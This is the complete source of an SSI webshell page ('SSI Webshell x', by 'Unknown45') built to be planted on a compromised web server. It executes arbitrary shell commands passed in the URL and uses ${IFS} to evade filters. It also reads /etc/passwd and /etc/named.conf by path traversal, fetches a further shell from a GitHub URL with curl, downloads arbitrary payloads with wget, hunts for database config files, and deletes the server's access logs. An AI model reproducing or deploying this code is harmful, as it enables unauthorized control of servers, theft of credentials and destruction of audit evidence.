<!--#config errmsg="Not Supported Command"--><!--#set var="zero" value="" --><!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --><!--#set var="shl" value="whoami" --><!--#else --><!--#set var="shl" value=$QUERY_STRING_UNESCAPED --><!--#endif -->SSI Webshell x<title>SSI Webshell x</title><meta name="theme-color" content="#000"><meta name="Author" content="Unknown45"><meta name="description" content="Security ? that just an illusion - "><meta property="og:description" content="Security ? that just an illusion - "><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css"><script language="javascript">function unknown45(){ var uri = document.getElementById('command').value; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"&&test";}function refresh() { document.location.href="<!--#echo var=DOCUMENT_NAME -->";}function checkfile() { document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"ls${IFS}-la";} function readpass() { var selectedobj=document.getElementById('readpass'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function readnamed() { var selectedobj=document.getElementById('readnamed'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function movefiles() { var selectedobj=document.getElementById('movefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function upfiles() { var selectedobj=document.getElementById('upfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function renamefiles() { var selectedobj=document.getElementById('renamefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function deletefiles() { var selectedobj=document.getElementById('deletefiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }} function findfiles() { var selectedobj=document.getElementById('findfiles'); if(selectedobj.className=='hide'){ //check if classname is hide selectedobj.style.display = "block"; selectedobj.readOnly=true; selectedobj.className ='show'; }else{ selectedobj.style.display = "none"; selectedobj.className ='hide'; }}function addupload(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/admin-security/admin/main/install.php${IFS}|${IFS}tee${IFS}-a${IFS}install.php";}function checkroot() { var uri = "ls -la "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->";}function deletelog() { var yakin = confirm("yakin hapus access logs nya ?"); if (yakin == true) { var uri = "rm -rf "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->/../logs/ *";} else { return true;}}function delsel() { var uri = "rm -rf "; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_NAME --> |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";}function movesatu(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;}function movedua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;}function movetiga(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;}function moveroot(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value;}function upfile(){ var url = document.getElementById('linknya').value; var https = url.split("https://").join(""); var http = https.split("http://").join(""); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";}function renamefile(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";}function deletefile(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";}function deleteinroot(){ var yakin = confirm("yakin hapus file ini di directory root ?"); if (yakin == true) { document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}<!--#echo var=DOCUMENT_ROOT -->";} else { return true;}}function deletefiledua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;}function findfile(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findinroot(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;}function findfiledua(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;}function finddb(){ document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";}</script><style type="text/css">@import url('https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap');.input {background: transparent;border-width: thin;cursor: pointer;border: 1.5px solid deeppink;}button {cursor: pointer;border: 1.5px solid deeppink;border-radius: 5px;font-size: 1rem;color: white;background-color: transparent;margin-bottom: 0.3rem;font-family: 'Kelly Slab';}button:hover {color: lime;border: 1.5px solid white;}</style><body onload="checkaja()" style="color: black;font-size: 0px;background: black;font-family: 'Kelly Slab';"> <div style="text-align: center;font-size: 2rem;color: white;"> <font>SSI WEBSHELL</font> </div> <div style="text-align: center;color: white;font-size: 1rem;"> <font>Command : </font> <input type=text size=60 id=command class="text" name="address1" style=" background-color: transparent;color: white;font-size: 1rem;border: 1.5px solid deeppink;border-radius: 5px;">&nbsp; <button class="input" id="gas" onclick="unknown45();"> <span>Execute</span> </button> </div> <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;"> <font style="color: white;">Host : </font><font style="color: lime;"> <!--#echo var=HTTP_HOST --> </font><br /> <font style="color: white;">Server Address : </font><font style="color: lime;"> <!--#echo var=SERVER_ADDR --> </font><br /> <font style="color: white;">User : </font><font style="color: lime;"> <!--#exec cmd="id" --> </font><br /> <font style="color: white;">System : </font><font style="color: lime;"> <!--#exec cmd="{uname,-nrv}" --> </font><br /> <font style="color: white;">Current Path : </font><font style="color: lime;"> <!--#echo var=DOCUMENT_ROOT --><!--#echo var=SCRIPT_NAME --> </font><br /> </div> <div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;"> <button onclick="refresh()">Refresh</button> <button onclick="checkfile()">List File</button> <button onclick="renamefiles()">Rename File</button> <button onclick="movefiles()">Move File</button> <button onclick="deletefiles()">Delete File</button> <button onclick="findfiles()">Find File</button> <button onclick="upfiles()">Upload File</button> <button onclick="delsel()">Remove Shell</button> </div> <div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;"> <button onclick="readpass();">Read /etc/passwd</button> <button onclick="readnamed();">Read /etc/named.conf</button> <button onclick="addupload()">Upload Shell</button> <button onclick="checkroot()">Check Root Directory</button> <button onclick="deletelog()">Delete Access Logs</button> </div> <div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;"> <font style="color: white;font-size: 1rem;">Executed Command : </font> <font id="cmd" style="color: white;font-size: 1rem;"><!--#echo var=shl --></font><br /> <textarea bgcolor=#e4e0d8 cols=121 rows=15 style="resize: none;font-family: 'Kelly Slab';background-color: transparent;width:99%;border: 1.5px solid lime;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;margin: 0.3rem;"><!--#exec cmd=$shl --></textarea><script> var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" "); document.getElementById("cmd").innerHTML = cmd; var gaskan = document.getElementById("command"); gaskan.addEventListener("keyup", function(event) { if (event.keyCode === 13) { event.preventDefault(); document.getElementById("gas").click(); }});</script><font id="readpass" style="display:none;color: white;font-size: 1rem;">
Read : /etc/passwd
<textarea bgcolor="#e4e0d8" cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"><!--#include virtual="/../../../../../../../../../../../../../../etc/passwd" --></textarea></font><font id="readnamed" style="display:none;color: white;font-size: 1rem;">
Read : /etc/named.conf
<textarea bgcolor=#e4e0d8 cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;"><!--#include virtual="/../../../../../../../../../../../../../../etc/named.conf" --></textarea></font><font id="movefiles" style="display:none;color: white;font-size: 1rem;">
Move File to previous directory

filename : <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="movefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="movesatu()">1 directory</button> <button onclick="movedua()">2 directory</button> <button onclick="movetiga()">3 directory</button> <button onclick="moveroot()">root directory</button></font><font id="renamefiles" style="display:none;color: white;font-size: 1rem;">
Rename File

<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameawal" style="resize: none; outline: none" required></textarea> to <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameakhir" style="resize: none; outline: none" required></textarea>
<button onclick="renamefile()">Gaskan</button></font><font id="upfiles" style="display:none;color: white;font-size: 1rem;">
Upload File

Link : <textarea bgcolor="#e4e0d8" cols="100" rows="1" id="linknya" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="upfile()">Gaskan</button></font><font face="courier" size="2" id="deletefiles" style="display:none;color: white;font-size: 1rem;">
Delete File
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="deletefile()">Delete</button> <button onclick="deleteinroot()">Delete this in root directory</button>

delete file in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletedir" style="resize: none; outline: none" required></textarea> <button onclick="deletefiledua()">Delete</button></font><font id="findfiles" style="display:none;color: white;font-size: 1rem;">
Find Files
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="findfile()">Find</button> <button onclick="finddb()">find database location (beta)</button> <button onclick="findinroot()">Find this in root directory</button>

find files in custom directories
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="finddir" style="resize: none; outline: none" required></textarea> <button onclick="findfiledua()">Find</button></font></div>